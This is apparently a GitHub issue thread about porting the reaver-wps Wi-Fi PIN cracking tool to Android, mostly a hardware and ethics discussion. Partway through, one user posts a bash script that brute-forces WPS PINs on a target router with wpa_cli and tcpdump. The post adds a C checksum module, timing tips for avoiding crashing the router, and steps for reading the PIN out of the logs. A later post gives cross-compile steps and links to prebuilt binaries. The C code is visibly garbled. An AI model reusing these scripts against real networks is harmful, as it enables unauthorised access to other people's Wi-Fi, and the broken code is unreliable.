Needs to be ported to Android, pleaseee??? about reaver-wps HOT 47 OPEN

Can you get packet injection working on your android phone?
I guess that might/will be the biggest problem.

Unless you can inject packets I don't see it happening

Some time ago i made working monitor mode and packet injection on g1 ( wifi 
chipset wl1251 ) thx to n900 patches so at least on g1 / hero / magic ( all got 
wl1251 ) it should be possible. 
http://forum.xda-developers.com/showthread.php?t=1271854

[deleted comment]

Supply me an android phone that will do monitor+inject and I will make it 
happen.

-peter

[deleted comment]

If an A855 Motorola Droid can do monitor+inject, I can produce a working 
handset.

Most Motorola phones use TI chipsets which are not capable.

If i provid a micro linux embedded device that run an OpenWrt distro may be is 
possible release a porting ?

Some devices support USB-OTG, which would enable a kernel module, like rtl8187, 
for use with a USB wireless adapter.  

I think that this tool needs to stay on PC.Because today any kiddie with this 
tool and Android smartphone can then hack their neighbors network and do all 
kinds of trouble.And honestly we don't want increase of kid hackers.

not just that but this tool boots clients off their routers.. we don't need 
this in the hands of idiots =] or a windows version

what's wrong with a netbook like the eee? < 1 sec a pin on a cisco router.. I 
wish there was a paypal to donate- I'd send a few bucks.. some really good code 
here and he's integrating it into aircrack.. I see the site is selling a idiot 
box to do this but if you have 600 bucks to throw around- then you are probably 
proficient in other areas of life.. so have at it- I'm worried about the 12 
year old snufalufagus with his phone denying his neighbors wifi by pressing a 
button

it's like giving airpwn and a yagi to a moron and expecting him not to use it 
on starbucks

between this and pyrit, it's no wonder I run wired at home with a long pass to 
my ap.. even the brand new att routers are still vulnerable to the same attacks 
as the last set, 100% breakable with the default key using wpa2.. who's in 
charge of security over there, a cow maybe

Considering that there is little consistency regarding android hardware this is 
not the most likely port to occur, if it does then no doubt people will have to 
buy the appropriate model (and revision) of phone (and a few sets of spare 
batteries)

I'm sensing childishness though regarding the seeming anger regarding script 
kiddies, do you really think that the script kiddies don't have laptops & 
netbooks? If you where particularly knowledgeable you wouldn't be shouting 
about keeping the tool PC only.

With Beagleboards, shivaplugs, Raspberry Pi and modded Pogoplugs there are a 
multitude of low power consumption devices with USB (to use a network adaptor 
of choice) to cause problems with (high powered antenna are not necessary with 
such a setup) so don't be getting so precious folks, calm down

BTW there is real Wifi kit out there (I work with it) that live in retail 
chains (and corporate land) strangely enough they do not use WPS, yes they have 
been checked since christmas (to make sure they don't respond anyway), they are 
much more interesting to play with than the average SoHo equipment

[deleted comment]

laptops and netbooks with windows running vmware and bt? yeah that's exactly 
what they run.. but they've been limited to open and wep networks usually.. 
wpa2 solved with crunch piped to pyrit | cowpatty at 100k+/sec or dictionary 
attack without a pre generated rainbow table is still out of skill set of the 
snuffaluffagus.. they know nothing about these specific attacks or specialized 
attacks on different types of routers, nothing because it takes more than 
./configure make && make install..

reaver is so easy and automated, if it were to be ported to say ios for example 
(jailbroke)- not just android (and it worked even with specific mass produced 
phones), there would be jackass bowel movements all over the world.. I don't 
care if a responsible geek manages to do this.. just the code he has written 
here is almost too slick if you know what I'm sayin- he could have thrown in 
some monkey wrenches =p I'm just sayin.. felt the same way about armitage..

anyways it's just my opinion on the matter.. what's sad is I noticed business 
around here still running wep (even the bmw dealership's office runs wep here) 
and at&t up to last year was still installing their 2wire routers with wep as 
default

now they've switched to wpa2 but still have the same problem with the default 
passkey, 10 characters numeric- that's 30 hours in pyrit for all the keys.. if 
the wps pin attack didn't act like a dos on the router, I might not care- just 
in the wrong hands this is a double butt violater

I have to admit that for me an android version of reaver would be useful as the 
people who hold the purse strings would get upset at a phone being used to 
break their network security. For some reason 'management' still think that 'IT 
professionals' are the only people on earth who have laptops (whatever an IT 
professional is)

Anyway this will now be heading off topic

The biggest script kiddies I have ever encountered are so called professional 
pen testers, they have their bought copy of Nessus on windows and a VM with 
Backtrack then they simply follow their course notes, usually without much 
understanding of the  'security issues' which they encounter.

However it has to be remembered that tomorrows talented 'security researchers' 
are todays beginners and very few beginners start with original methods.

Without reaver (or the other python script) would you be playing with WPS 
breaking ?
I can answer an honest NO (for myself), though 15-20 years ago the answer would 
have been Yes, as my life permitted me time to write interesting things.
If your answer is 'no' then please don't complain about idiots who have the 
same tools as you, it happens and they have as much right as you have.

I used to be really uptight about the undeserving cut & paste coders & 
crackers, I'm older now.

re: There's poor security all over though sometimes there are reasons (mostly 
arrogance, ignorance and cost) but sometimes its unavoidable legacy kit is 
common, but  the risk may be mitigated with careful firewalling, IDS and sanity 
checking

Be thankful the tool exists in a reliable version and encourage it's spread to 
other platforms, you may have need of it at some point

motorola backflip here, is the same shit that my laptop, (broadcom stuff), as 
far as i tried, just could enable monitor mode (buggy) and packets injection is 
impossible, im pretty sure it can be done on another phone using a different 
wlan chipset.

Just wait for a recent kernel. Thanks to mac80211 nearly every recent driver in 
the vanilla kernel supports package injection and monitor mode. Android phones 
has just mostly very old kernel running.

If tcpdump, wpa_cli and bash are available for android, which a quick bit of 
recon tells me they are.

Then a workaround is more than likely possible. ;)

For those who are alright with their programming, heres some basic building 
blocks for a potential android wps tester. I'm just beginning programming, but 
with a bit of help i rustled this up...this is the latest code i have working 
thus far on a regular system that is....

Pre-requisites that would need to be working already on android are... 

Bash
Tcp-dump,
Wpa-cli/wpa_supplicant
Tee
Ean8 (seperate module...i will include code as a suffix)

Heres the code i have working at the mo....The lines may get messed up, so I've 
used me newly created #EL Tags to show where new lines are. Remove at own 
discretion.
Name this file wpstester, or whatever you like ;), set its permissions, jobs a 
good un. This is fairly system specific so you might need to tweak it here and 
there to get it working properly. 

#!/bin/bash #EL

        sudo tcpdump -i wlan0 -v -l 2> /dev/null | tee /home/$USER/log.txt & #EL

sleep 7 #EL

        for i in {0..1}; do  #EL
        code=$(printf "%04d"000 $i) #EL
        ans=$(ean8 $code) #EL
        echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
        echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
        echo "WPS PIN : $ans" #EL
        echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
        wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL

sleep 15 #EL

done #EL

for i in {2..2000}; do #EL
        code=$(printf "%04d"000 $i) #EL
        ans=$(ean8 $code) #EL
        echo "Time : $(date +%H:%M:%S)" >> /home/$USER/log1.txt #EL
        echo "BSSID : BSSID HERE" >> /home/$USER/log1.txt #EL
        echo "WPS PIN : $ans" #EL
        echo "WPS PIN : $ans" >> /home/$USER/log1.txt #EL
        wpa_cli wps_reg BSSID HERE $ans >> /dev/null #EL

sleep 10 #EL

done #EL

sudo kill -9 2> /dev/null $(ps -A | grep tcpdump | awk '{print$1}') #EL

exit 0 #EL



And the Ean8 Module.....



#include <stdio.h> #include <stdlib.h> #include <string.h>

int main(int argc, char argv) {

    int i, odd_sum = 0, even_sum = 0, sum, check_digit; // to install 'make ean8' or 'gcc -o ean8 ean8.c' char base; // then move exe to /bin path. 

    if (argc != 2) {

        fprintf(stderr, "Error: Wrong number of arguments\n"); exit(EXIT_FAILURE); 

    } 

    base = argv1?; 

    if (strlen(base) != 7) {

        fprintf(stderr, "Error: Argument is not 7 characters\n"); exit(EXIT_FAILURE); 

    } 

    for (i = 0; i < 7; i += 2) {

        // Odd digits odd_sum += basei? - '0'; 

    } 

    for (i = 1; i < 7; i += 2) {

        // Even digits even_sum += basei? - '0'; 

    } 

    sum = odd_sum 3 + even_sum; check_digit = (10 - (sum % 10)) % 10; printf("%s%d\n", base, check_digit); 

    return(EXIT_SUCCESS); 

} 

Theres some other little tweaks you may have to do as well, to a couple of the 
other programs, I've posted what i did with those on the hints and tips part of 
this forum. 

Maybe this will help someone along the line come up with a workaround for 
android...who knows.....If a reaver port isn't forthcoming.

Only downside is this workaround is a bit slower than reaver, until i figure 
out how to implement small dh keys by tweaking the code in more than likely 
wpa_supplicant/wpa_cli.

Good luck dudes/dudettes ;)

P.s the third sleep command can be set as a variable to whatever you find the 
minimum try time is before you fry/crash the router you are testing. 

There is a trend i noticed whereby the first 1-2 tries take slightly longer 
than the average send time, and if you put a longer sleep time for the first 
1-2 attempts, then the following attempts can actually be sped up 
significantly. Granted this isn't as fast as reavers small dh-keys, but for a 
work-around i guess its o.k ;)

Sorry triple post....Then you just have to grep the log files for 'id 4'. (Off 
the top of my head, might be 'id 3' though =P) That result cross-correlates 
with the time in the other log-file and there you have the first 4 digits of 
the wps pin.

Haha sorry last thing. 

In the original post on the hints and tips part i mentioned using wireshark.

You can use this method if you want, but the newer post above, creates a 
semi-automatic solution, (i.e its better). By using the generically available 
tcpdump instead, and integrating it as a co-process in the source-code.

Perhaps someone else can then take this and fully-automate it, the next step 
was to integrate a sectional grepping procedure...i.e test 1..100 pins then 
stop grep...check for 'id 3 (or 4)'continue...

I suppose i can continue my quest though, its actually a fascinating project 
for learning a little programming =P.

Any progress with reaver working with android? 

Yes. Put backtrack 5 on android!

N900 and N950 has reaver.

[deleted comment]

[deleted comment]

Monitor mod in android un possible. http://bcmon.blogspot.fi/. now only what we 
need is reaver :)

OMG, so much thanks for that link !!!!1 ;DDDD

Anyway Reaver needs root, that's why it wouldn't be program for children :-) 

Is there any way to boot it in Symbian OS?

Any updates? I'd love to get reaver on my phone.

hey there android supports now rtl 8187 chipset in monitor mode via USB-OTG no 
root required
http://www.kismetwireless.net/android-pcap/

might be that injection would work too... so anyone out there ready to make 
reaver-android port??

HD2 with Android and Backtrack installed.
I have compiled and installed bcm4329 driver with monitor mode that works 
correctly with airomon and aireplay.
Also, I have compiled and installed Reaver, but there is support problem.
Reaver will not associate (timeout occur).
After aireplay fakeauth Reaver associate but start getting 
WARNING: Receive timeout occurred  

Recorder PCAP file with both Reaver association attempt and after areplay 
association:
https://www.dropbox.com/s/bjsq8q2hfuyv7tc/rr-02.cap

Just checked from other computer that monitored same AP activity. There is no 
any packet actually sent from HD2 via Reaver. 
Only when I used areplay packet was really sent.
rr-02.cap shows packet cap from same device as Reaver.

Driver Developer mentioned following:
"Radiotap - we don't handle radiotap on packet injection. 'aireplay-ng' works 
fine with it but tools like 'reaver' seem to require it."

Can you make a support for packet injection without Radiotap ? (Like on 
aireplay) 

People new update on monitor mode on Android:
http://bcmon.blogspot.de/2013/07/monitor-mode-reloaded_14.html

As far as i know that was one of the big problem to not having Reaver ported to 
Android.

#35
How did you compile and install Reaver on Android? I'm on a Nexus 7 with 
CyanogenMod 10.1.2. Thanks in advance.

Done.

http://forum.xda-developers.com/showthread.php?t=2456888

BCMON.apk does not work correctly with HD2 (ICS myMIUI ROM).
ping_bcmon does not returns packets.

I have tested supplied reaver with older (2012) bcmon kernel module drivers, 
reaver starts fine but will not inject packets. Function pcap_inject is 
processed without exception but packet do not leave interface. 

I feel like no one read anything that was being written on this blog 
previously. Did no one notice that it's a good thing to not have tons of people 
have this on their iPhones? Keep it to yourself. Don't post android ROMs with 
reaver already installed online. Just do it by yourself. Do not jeopardize 
Internet security for temporary happiness. That's terrorism. I feel like there 
are only a few software engineers who would like to be terrorists.

Ok calm down francis

Jeopardizing Internet security?  Sheesh.

If Reaver works on it, it was already insecure long before it became easy...

Hello every one , does any one can help to install reaver it gives me error 
pleaseeeeeeeeee:
./configure 
checking for gcc... gcc
checking whether the C compiler works... no
configure: error: in `/root/reaver-1.4/src':
configure: error: C compiler cannot create executables
See `config.log' for more details.

i installed bcmon and reaver for android but when i opened RfA and test the 
monitor mode it showed me an error that monitor mode activation failed what to 
do now

[deleted comment]

[deleted comment]

Porting reaver-wps for android ARM platform

Steps:

1 - install crosscompiler ARM GNUEABI ( sudo apt-get install 
gcc-4.7-arm-linux-gnueabi g++-4.7-arm-linux-gnueabi)
2 - Download http://www.infradead.org/~tgr/libnl/files/libnl-3.2.25.tar.gz
3 - Download http://www.tcpdump.org/release/libpcap-1.7.4.tar.gz
4 - Download Reaver-WPS source 
5 - extract libnl-3.2.25.tar.gz and libpcap-1.7.4.tar.gz
6 - execute configure script for build Makefile LIBNL3(./configure 
--prefix=/system --host=arm-linux-gnueabi LDFLAGS='-static -L/system/lib' && 
make && sudo make install
7 - execute configure script for build Makefile LIBPCAP(./configure 
--prefix=/system --host=arm-linux-gnueabi --with-pcap=linux 
CFLAGS='-I/system/include/libnl3' LDFLAGS='-static -L/system/lib' && make && 
sudo make install
8 - download https://www.sqlite.org/2015/sqlite-autoconf-3081101.tar.gz SQLITE3 
( /configure --prefix=/system --host=arm-linux-gnueabi 
CFLAGS='-L/system/include' LDFLAGS='-static -L/system/lib' && make && sudo make 
install)
9 Configuring for compiler ARM Reaver-WPS ./configure --prefix=/system 
--sysconf=/etc && make V=1 CC=arm-linux-gnueabi-gcc CFLAGS='-pthread -s -static'
10 copy files wash and reaver static compiled to /system/xbin in rooted device  
(my rooted CM12 device is XT1069 using Dongle USB OTG TL-WR721N TPKINK firmware 
kernel ath9k_htc modules ARM)

compiled binary files static

https://mega.co.nz/#!ZcN0EZoZ!DSSGCI4VV1O9eNd-fzmcr0Hu-t5XWxHfU9RJcaSn8D4
https://mega.co.nz/#!wd1EFZia!bROKZ4TFKx24w7niTMcZCU1YGw3D-QpwWUl5AZhW4uY

Reaver-WPS GUI APK
http://forum.xda-developers.com/showthread.php?t=2456888

have Fun :)